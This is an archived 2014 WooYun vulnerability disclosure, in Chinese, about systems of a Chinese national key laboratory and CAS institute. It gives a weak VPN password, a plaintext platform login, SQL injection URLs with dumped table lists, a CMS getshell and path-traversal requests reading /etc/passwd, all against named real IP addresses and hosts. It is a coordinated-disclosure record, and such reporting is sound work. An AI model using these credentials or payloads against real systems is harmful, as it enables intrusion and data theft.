当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070084

漏洞标题:由某国家重点实验室VPN系统弱口令致内网安全风险

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-07-29 09:11

修复时间:2014-09-12 09:12

公开时间:2014-09-12 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-29: 细节已通知厂商并且等待厂商处理中
2014-08-03: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向核心白帽子及相关领域专家公开
2014-08-23: 细节向普通白帽子公开
2014-09-02: 细节向实习白帽子公开
2014-09-12: 细节向公众公开

简要描述:

由某国家重点实验室VPN系统弱口令致内网安全风险

详细说明:

一、
资源与环境信息系统国家重点实验室VPN系统.https://159.226.110.180/

1.png


1.弱口令:用户/密码:test/test

2.png


2.登录VPN,杀入内网系统:
中国科学院地理科学与资源研究所内部办公网
大量邮箱地址(http://192.168.100.1/xwxx/mailc.htm)
以及联系方式(http://192.168.100.1/xwxx/dhhm.mht)

3.png

4.png

5.png


3.
(1)登录其数据在线平台:
JCR期刊分区数据在线平台
帐号:igsnrr 密码:dlstsg
http://www.fenqubiao.com/Core/Category.aspx?id=358

6.png

7.png


(2)全球产品样本数据库(GPD)可直接登录:gpd.las.ac.cn/Default.aspx

8.png

9.png


二、
(1)DEDECMS系统 getshell
http://159.226.110.214/
http://159.226.110.214/dede

10.png

11.png


(2)同时影响网站:http://carbontracker.net/
(http://www.qdstc.gov.cn/nv.aspx?id=36190)
http://carbontracker.net/images/test.txt

科技日报讯 (记者张晶)记者从中国科学院地理科学与资源研究所获悉,我国首个高时空分辨率碳同化反演系统——中科院碳追踪同化系统(CarbonTracker-China,CAS)于日前发布。依据该软件系统,可以通过大气二氧化碳浓度的观测数据来估算陆地生态系统碳源碳汇的分布信息。

13.png

12.png


三、
973计划资源环境领域项目数据汇交服务网 http://159.226.110.224/
(1)注入:http://159.226.110.224/news/newsdetails.jsp?id=8

14.png

web application technology: JSP
back-end DBMS: Oracle
Database: DASN973_2
[27 tables]
+------------------------------+
| ARCHIVEDATA |
| ARCHIVEPROGRESS |
| CATEGORY_NEWS |
| CATEGORY_PROJECT |
| CATEGORY_USER_DEGREE |
| CATEGORY_USER_INDUSTRY |
| MESSAGES |
| METADATA |
| METADATA_AVAILABLEDATA |
| METADATA_BAK |
| METADATA_CONTACTS |
| METADATA_YUAN |
| NEWS |
| NEWS_CATEGORY |
| PAPER |
| PROJECT |
| PROJECT_CATEGORY |
| PROJECT_PERSON |
| SITE_DOWNLOADS |
| SITE_DOWNLOADS_20120301_1413 |
| SITE_DOWNLOADS_BAK |
| SITE_DOWNLOADS_GLOBAL |
| SITE_VISITS |
| SITE_VISITS_GLOBAL |
| STAT_METADATA_HITS |
| USERS |
| WEBSITE_INVESTIGATION |
+------------------------------+


(2)任意文件下载:
http://159.226.110.224/docs/download.jsp?path=../../../../../../../etc/passwd
http://159.226.110.224/docs/download.jsp?path=/WEB-INF/web.xml
http://159.226.110.224/docs/download.jsp?path=/metadata/accessData.jsp

15.png


四、
国家生态系统观测研究网络 http://159.226.110.244/index.action
注入:http://159.226.110.244/getContent.action?id=2256&class_id=77&article_class_id=77

16.png

web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: db_cmschn
[57 tables]
+---------------------------+
| announce |
| announce_class |
| article |
| article_audit |
| article_class |
| article_class_ext_image |
| article_color_templet |
| article_img |
| article_pagination |
| article_source |
| article_special |
| class_priv |
| cluster_node |
| config_file_upload |
| config_member |
| config_member_column |
| config_site |
| login_info |
| map_class_user |
| map_group_article_class |
| map_group_module |
| map_user_module |
| member_info |
| member_upgrade_key |
| public_map_object_purview |
| sa_user |
| search_index_db |
| search_index_resource |
| stat_site_counter |
| sys_action_mapping |
| sys_actions |
| sys_config |
| sys_data_bak |
| sys_data_bak_tables |
| sys_group |
| sys_ip_res |
| sys_log_oper |
| sys_log_type |
| sys_log_user |
| sys_module |
| sys_public_attribute |
| sys_resource |
| sys_restricts |
| sys_sequence |
| sys_stat_count_info |
| sys_stat_count_search |
| sys_stat_count_site |
| sys_templet |
| sys_templet_class |
| sys_templet_editor |
| uip_consultation |
| uip_content |
| uip_menu |
| uip_menukind |
| user_group_purview_map |
| user_purview_map |
| vote |
+---------------------------+


漏洞证明:

如上

修复方案:

各种修复.

版权声明:转载请注明来源 袋鼠妈妈@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-03 08:58

厂商回复:

最新状态:

2014-08-04:CNVD确认并复现所述情况,已经转由CNCERT向中国科学院计算机网络管理中心通报处置,并向某设备生产厂商通报。